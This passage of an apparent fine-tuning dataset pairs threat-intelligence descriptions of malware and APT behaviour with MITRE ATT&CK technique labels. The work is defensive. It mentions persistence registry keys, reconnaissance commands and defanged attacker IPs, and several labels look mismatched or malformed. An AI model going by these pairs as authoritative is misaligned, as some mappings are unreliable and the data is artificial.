ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NanoCore has the capability to edit the Registry." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KOCTOPUS has used PowerShell commands to download additional files." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The script is used to decode and execute the following payloads:Appach01.jpg (renamed: Windows-KB275122-x86.exe) is a Freenki sample.Appach01.jpg (renamed: Windows-KB271854-x86.exe) is a PoohMilk sample.PoohMilk AnalysisThe PoohMilk sample is designed to perform two actions:Create persistence to execute the Freenki sample at the next reboot.Check specific files on the infected machine.The first action is to create a registry key in order to execute the Windows-KB275122-x86.exe file previously downloaded" }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "establishes persistence by adding a new service with the display name \"WMI Performance Adapter Extension\" in an attempt to masquerade as a legitimate WMI service." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA505 has used .iso files to deploy malicious .lnk files." }, { "role": "assistant", "content": "T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium can use multiple domains and protocols in C2." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "On execution, the MSI downloader starts by checking if it is running in a virtual machine. If not, downloads a zip file, unzips it, deletes itself, establishes persistency and restarts the system" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1102.003 - One-Way Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ComRAT has used encryption and base64 to obfuscate its orchestrator code in the Registry. ComRAT has encrypted its virtual file system using AES-256 in XTS mode and has encoded PowerShell scripts." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PlugX has a module to list the processes running on a machine." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some variants have used South Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "wmic.exe is a powerful, native Windows command line utility used to interact with Windows Management Instrumentation (WMI)" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cadelspy has the ability to discover information about the compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QUADAGENT uses multiple protocols (HTTPS, HTTP, DNS) for its C2 server as fallback channels if communication with one is unsuccessful." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has exploited Microsoft Word vulnerability CVE-2017-0199 for execution." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Seaduke delivery The attackers control Cozyduke via compromised websites, issuing instructions to infected machines by uploading “tasks” to a database file. Cozyduke will periodically contact these websites to retrieve task information to be executed on the local machine. One such task (an encoded PowerShell script) instructed Cozyduke to download and execute Seaduke from a compromised website" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrifeWater can encrypt C2 traffic using XOR with a hard coded key." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "leverages vulnerable versions of Flash to perform execution." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Janicab captured screenshots and sent them out to a C2 server." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used , a RAT that uses HTTP to communicate." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has downloaded additional tools, such as TEARDROP malware and Cobalt Strike, to a compromised host following initial access." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The initial beacon packet for Mis-Type contains the operating system version and file system of the victim." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fox Kitten has used Google Chrome bookmarks to identify internal resources and assets." }, { "role": "assistant", "content": "T1217 - Browser Bookmark Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound granted compromised email accounts read access to the email boxes of additional targeted accounts. The group then was able to authenticate to the intended victim's OWA (Outlook Web Access) portal and read hundreds of email communications for information on Middle East organizations." }, { "role": "assistant", "content": "T1098 - Account Manipulation', 'T1098.002 - Account Manipulation: Additional Email Delegate Permissions" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has used tools capable of stealing contents of the clipboard." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FruitFly takes screenshots of the user's desktop." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sliver can take screenshots of the victim’s active display." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is initially packed." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Afterwards, the persistence file will be created in /Library/LaunchDaemons/ or ~/Library/LaunchAgents/ folder. This persistence file is also set to hidden with a randomly generated file date and time" }, { "role": "assistant", "content": "T1543.004 - Create or Modify System Process: Launch Daemon', 'T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can use \"net localgroup\" to enable discovery of local groups." }, { "role": "assistant", "content": "T1069.001 - Permission Groups Discovery: Local Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "yty collects screenshots of the victim machine." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The discovery modules used with Duqu can collect information on network connections." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The plugin is executed by using the Info command in the Lizar client application. A data structure containing the OS version, user name and computer name is sent to the server" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To compress the data, GetFrame() invokes the Common.Compress() method, which is used to compress the data by leveraging the C# GZipStream compression class" }, { "role": "assistant", "content": "T1560.002 - Archive Collected Data: Archive via Library" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 has used SSH to move laterally through victim environments." }, { "role": "assistant", "content": "T1021.004 - Remote Services: SSH" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WellMail can identify the IP address of the victim system." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Executes VBScript using Process.Start. Next, the DLL loads an embedded resource named \"78c855a088924e92a7f60d661c3d1845\" into memory and decrypts it using multiple XOR operations. Loads the resource using Assembly.GetManifestResourceStream. Method that performs the XOR decryption. The decrypted resource is a DLL file embedded with two resources named \"AdvancedRun\" and \"Waqybg\" that are compressed with GZip. Two resources embedded in the decrypted resource. The third-stage DLL proceeds by loading the \"AdvancedRun\" resource into memory, decompressing it and dropping it as \"AdvancedRun.exe\" into the %TEMP% directory. Calling GZipStream class to decompress the resource. Drops AdvancedRun.exe using File.WriteAllBytes. The TrustedInstaller group was an addition to Windows beginning in Windows 7 with the goal of preventing accidental damage to critical system files" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "According to Group-IB's Threat Intelligence & Attribution system, the alleged database was published on a fraudulent resource known for reselling data that has been published on various data-leak websites. Compromise of Air India's network In mid-February 2021, Group-IB's Threat Intelligence & Attribution system detected infected devices that were part of Air India's computer network. Starting from at least February 23, 2021, a device inside the company's network communicated with a server with the IP address 185[.]118[.]166[.]66. The threat actor collected information inside the local network, including names of network resources and their addresses. Below are examples of commands that were used for lateral movement: . The name of the campaign, ColunmTK, is derived from these initially discovered domains. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. According to Group-IB's Threat Intelligence & Attribution system, the threat actor has been active since at least 2007. This IP address was used as an A record for two domains: server04[.]dns04[.]com and service04[.]dns04[.]com. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers" }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Higaisa’s shellcode attempted to find the process ID of the current process." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can use `SetWindowsHookEx` and `GetKeyNameText` to capture keystrokes." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EXOTIC LILY has used malicious links to lure users into executing malicious payloads." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When exfiltrating the keychain, the keychain field is used instead of data" }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) The malicious macro scans the victim’s Outlook inbox and looks for the strings “$$cpte” and “$$ecpte”. 2) Then the macro will open a CMD shell that will execute whatever instruction / command is in between the strings. 4) The macro searches for the special strings in the “Deleted Items” folder to find the attacker’s email address and sends the data back to the attackers via email. 5) Lastly, the macro will delete any evidence of the emails received or sent by the attackers" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleSeed can use a second channel for C2 when the primary channel is in upload mode." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has commands to get the time the machine was built, the time, and the time zone." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cybercriminals will often use LNK files attached in an email to launch an attack on unsuspecting victims. And we recently noticed another campaign using this technique" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has used batch scripts to enumerate network information, including information about trusts, zones, and the domain." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This can be seen in the following images taken from hxxp:// feeds.rapidfeeds[.]com/88604/, which is one of the dead drop resolvers we encountered in this sample: Figure 7 Dead drop resolver used by BADNEWS   In order to decrypt this data, the authors have included additional steps from previous versions" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zebrocy uses \"netstat -aon\" to gather network connection information." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cuba has the ability to encrypt system data and add the \".cuba\" extension to encrypted files." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download and upload files to the victim's machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 1 XAgent macOS HTTP POST request Figure 2 XAgent mscOS HTTP GET request The C2 URLs generated by XAgentOSX are very similar to those created by its Windows-based counterpart" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GreyEnergy uses HTTP and HTTPS for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors used the `net share` command as part of their advanced reconnaissance." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be used to create to upload and/or download files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WastedLocker's custom cryptor, CryptOne, used an XOR based algorithm to decrypt the payload." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WindTail has the ability to decrypt strings using hard-coded AES keys." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HyperBro has the ability to pack its payload." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "establishes persistence by installing a new service pointing to its DLL and setting the service to auto-start." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some variants of use AppInit_DLLs to achieve persistence by creating the following Registry key: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows \"AppInit_DLLs\"=\"pserver32.dll\"" }, { "role": "assistant", "content": "T1546.010 - Event Triggered Execution: AppInit DLLs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Another interesting technique this malware uses is Visual Studio’s Resource Manager. This is a feature built into Visual Studio that allows one to attach basically any file to the original binary and get a pointer to its data with a few simple API calls. Siloscape uses this method to write the Tor archive to the disk, as well as the unzip binary used to open the archive. It also uses Tor to securely connect to its C2" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used a batch script that adds a Registry Run key to establish malware persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conficker variants spread through NetBIOS share propagation." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. In october 2016 Group-IB published the report about the Cobalt group. Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. 6 Example of a message sent by attackers from a domain whose name is similar to the name of a real domain . As soon as the attachment is launched and the malicious code is executed, the Cobalt Strike payload is loaded in the memory. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LockerGoga has been observed deleting its original launcher after execution." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Between August 2 and 4, the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors" }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Actors used the tasklist command to get information about running processes on a system and determine if the system was a VMware virtual machine. The actors used tasklist.exe and find.exe to display a list of applications and services with their PIDs for all tasks running" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Small Sieve can use Python scripts to execute commands." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The \"net accounts\" and \"net accounts /domain\" commands with Net can be used to obtain password policy information." }, { "role": "assistant", "content": "T1201 - Password Policy Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In addition to plainpwd and CredRaptor the toolkit includes a keylogger. The keylogger uses a standard technique to capture keystrokes, specifically the SetWindowsHookEx function" }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PcShare can obtain a list of running processes on a compromised host." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In many payment card data breaches, a point-of-sale (POS) system is infected with malware that searches for specific processes in memory known to store card data in plain text" }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can install itself as a new service." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Skidmap has the ability to download files on an infected host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The threat actors commonly created web shells on the intended targets’ publicly accessible email and web servers. The threat actors used three different filenames (“global.aspx, autodiscover.aspx and index.aspx) for two different webshells" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kwampirs collects OS version information such as registered owner details, manufacturer details, processor type, available storage, installed patches, hostname, version info, system date, and other system information by using the commands \"systeminfo\", \"net config workstation\", \"hostname\", \"ver\", \"set\", and \"date /t\"." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MarkiRAT can run the ShellExecuteW API via the Windows Command Shell." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BackConfig has the ability to use HTTPS for C2 communiations." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TRITON was run as trilog.exe, a Py2EXE compiled python script that accepts a single IP address as a flag." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowGoop can receive encrypted commands from C2." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "obfuscated several scriptlets and code used on the victim’s machine, including through use of XOR." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ragnar Locker may attempt to connect to removable 